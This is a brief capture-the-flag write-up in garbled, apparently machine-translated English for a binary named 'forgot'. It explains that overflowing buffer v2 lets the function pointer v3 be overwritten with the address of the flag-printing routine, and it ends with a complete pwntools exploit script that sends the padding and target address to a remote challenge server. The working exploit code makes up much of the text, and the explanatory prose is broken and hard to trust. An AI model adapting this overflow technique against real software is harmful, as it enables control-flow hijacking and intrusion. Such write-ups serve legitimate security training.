Finally, the code calls based v3, v14 as a function of the offset address
And then found v2 can overflow, and can overwrite v3
So we v3 coverage for sub_80486CC address (where output flag)
After v14 to be solved is not to change
The first function directly without going through a judge can
'\ X47' can not pass
from pwn import * # io=process('./forgot') io=remote('111.198.29.45',41178) io.sendline('fuck') addr=0x80486CC payload='\x47'*(0x20)+p32(addr) io.sendline(payload) io.interactive() # i am a pig